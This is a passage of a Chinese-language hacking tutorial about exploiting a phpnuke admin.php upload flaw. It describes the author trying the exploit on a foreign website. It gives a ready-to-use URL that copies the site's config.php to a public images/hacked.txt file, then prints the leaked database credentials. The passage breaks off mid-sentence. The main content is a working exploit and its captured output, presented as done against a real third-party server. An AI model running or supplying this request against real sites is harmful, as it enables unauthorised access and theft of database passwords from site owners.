SAN是怎么利用phpnuke的漏洞做坏事的

而且phpnuke做出来的页面，风格非常明显，易于辨认，所以san就找了一个国外站点试了试……
　　
　　二、简单利用
　　很直接的利用方法就是，用下面的语句将phpnuke的配置文件config.php拷贝到phpnuke目录下的images/hacked.txt，如下：
　　
　　http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
　　
　　这样通过在浏览器上输入：
　　
　　http://www.server.net/images/hacked.txt，就可以看到config.php的内容了，当然包括里面的sql密码等敏感信息，比如下面就是该server的config.php片断：
　　
　　-----------------snip--------------------------
　　
　　######################################################################
　　# Database & System Config
　　#
　　# dbhost:　 MySQL Database Hostname
　　# dbuname:　MySQL Username
　　# dbpass:　 MySQL Password
　　# dbname:　 MySQL Database Name
　　# system:　 0 for Unix/Linux, 1 for Windows
　　######################################################################
　　
　　$dbhost = "localhost";
　　$dbuname = "phpnuke";
　　$dbpass = "nukeitnow";
　　$dbname = "phpnuke_44";
　　$system = 0;
　　
　　-----------------snip--------------------------
　　
　　而且，